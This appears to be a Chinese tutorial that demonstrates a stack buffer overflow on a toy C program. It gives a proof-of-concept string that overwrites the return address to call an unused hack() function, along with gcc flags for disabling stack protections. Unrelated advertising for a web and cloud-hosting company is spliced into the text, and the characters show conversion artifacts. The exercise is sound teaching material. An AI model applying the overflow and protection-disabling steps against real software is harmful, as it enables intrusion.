#include#include void fun(char *name){ char buf[10]; strcpy(buf,name); printf("%s\n",buf); } void hack(){ printf("flag\n"); } int main(){ char name[]="Alex@bbb"; fun(name); return 0; }
上面的程序是一個正常的C語言程序,但是main函數(shù)中沒有調(diào)用hack()函數(shù),下面我就演示下如何利用緩沖區(qū)溢出來執(zhí)行hack函數(shù)的內(nèi)容。
成都創(chuàng)新互聯(lián)公司專注于網(wǎng)站建設(shè),為客戶提供網(wǎng)站設(shè)計制作、做網(wǎng)站、網(wǎng)頁設(shè)計開發(fā)服務(wù),多年建網(wǎng)站服務(wù)經(jīng)驗,各類網(wǎng)站都可以開發(fā),品牌網(wǎng)站設(shè)計,公司官網(wǎng),公司展示網(wǎng)站,網(wǎng)站設(shè)計,建網(wǎng)站費用,建網(wǎng)站多少錢,價格優(yōu)惠,收費合理。使用codeblocks編譯并執(zhí)行上述程序后,拖入od查看棧的變化情況,看看給變量name賦什么值的時候,會恰好覆蓋掉call fun處的函數(shù)返回地址
F7跟進 F8 一句一句執(zhí)行:
因此我們添加poc:
#include#include void fun(char *name){ char buf[10]; strcpy(buf,name); printf("%s\n",buf); } void hack(){ printf("flag\n"); } int main(){ char name[]="Alex@bbbaaaaaaaaaaaaaa\x59\x13\x40\00"; //這里后邊四個為hack()函數(shù)地址 fun(name); return 0; }
重新編譯執(zhí)行后,我們發(fā)現(xiàn)利用成功:
在使用ubuntu復(fù)現(xiàn)棧溢出的時候需要關(guān)閉棧保護機制:
使用gcc編譯時全部關(guān)閉保護機制,參數(shù)-fno-stack-protector用來關(guān)閉gcc編譯器gs驗證碼機制,
-z execstack用來關(guān)閉ld鏈接器堆棧段不可執(zhí)行機制。
這里有一個linux下64位的棧溢出過程。
https://www.secpulse.com/archives/32328.html
另外有需要云服務(wù)器可以了解下創(chuàng)新互聯(lián)scvps.cn,海內(nèi)外云服務(wù)器15元起步,三天無理由+7*72小時售后在線,公司持有idc許可證,提供“云服務(wù)器、裸金屬服務(wù)器、高防服務(wù)器、香港服務(wù)器、美國服務(wù)器、虛擬主機、免備案服務(wù)器”等云主機租用服務(wù)以及企業(yè)上云的綜合解決方案,具有“安全穩(wěn)定、簡單易用、服務(wù)可用性高、性價比高”等特點與優(yōu)勢,專為企業(yè)上云打造定制,能夠滿足用戶豐富、多元化的應(yīng)用場景需求。